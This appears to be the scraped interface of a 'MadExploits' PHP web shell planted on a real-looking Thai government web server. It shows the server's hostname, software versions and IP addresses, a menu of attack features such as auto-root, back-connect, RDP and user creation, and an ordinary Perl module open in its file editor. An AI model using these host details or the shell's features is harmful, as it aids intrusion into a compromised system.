Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Pod /
[ HOME SHELL ]
Name
Size
Permission
Action
Perldoc
[ DIR ]
drwxr-xr-x
Simple
[ DIR ]
drwxr-xr-x
Text
[ DIR ]
drwxr-xr-x
Checker.pm
39.69
KB
-rw-r--r--
Escapes.pm
16.83
KB
-rw-r--r--
Find.pm
14.86
KB
-rw-r--r--
Functions.pm
13.95
KB
-rw-r--r--
Html.pm
60.85
KB
-rw-r--r--
InputObjects.pm
26.63
KB
-rw-r--r--
LaTeX.pm
58.05
KB
-rw-r--r--
Man.pm
66.58
KB
-rw-r--r--
ParseLink.pm
6.25
KB
-rw-r--r--
ParseUtils.pm
20.45
KB
-rw-r--r--
Parser.pm
63.89
KB
-rw-r--r--
Perldoc.pm
54.46
KB
-rw-r--r--
PlainText.pm
24.67
KB
-rw-r--r--
Plainer.pm
1.25
KB
-rw-r--r--
Select.pm
23.51
KB
-rw-r--r--
Simple.pm
48.91
KB
-rw-r--r--
Simple.pod
8.51
KB
-rw-r--r--
Text.pm
30.98
KB
-rw-r--r--
Usage.pm
23.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Plainer.pm
package Pod::Plainer; use strict; use Pod::Parser; our @ISA = qw(Pod::Parser); our $VERSION = '0.01'; our %E = qw( < lt > gt ); sub escape_ltgt { (undef, my $text) = @_; $text =~ s/([<>])/E<$E{$1}>/g; $text } sub simple_delimiters { (undef, my $seq) = @_; $seq -> left_delimiter( '<' ); $seq -> right_delimiter( '>' ); $seq; } sub textblock { my($parser,$text,$line) = @_; print {$parser->output_handle()} $parser->parse_text( { -expand_text => q(escape_ltgt), -expand_seq => q(simple_delimiters) }, $text, $line ) -> raw_text(); } 1; __END__ =head1 NAME Pod::Plainer - Perl extension for converting Pod to old style Pod. =head1 SYNOPSIS use Pod::Plainer; my $parser = Pod::Plainer -> new (); $parser -> parse_from_filehandle(\*STDIN); =head1 DESCRIPTION Pod::Plainer uses Pod::Parser which takes Pod with the (new) 'CE<lt>E<lt> .. E<gt>E<gt>' constructs and returns the old(er) style with just 'CE<lt>E<gt>'; '<' and '>' are replaced by 'EE<lt>ltE<gt>' and 'EE<lt>gtE<gt>'. This can be used to pre-process Pod before using tools which do not recognise the new style Pods. =head2 EXPORT None by default. =head1 AUTHOR Robin Barker, rmb1@cise.npl.co.uk =head1 SEE ALSO See L<Pod::Parser>. =cut
Close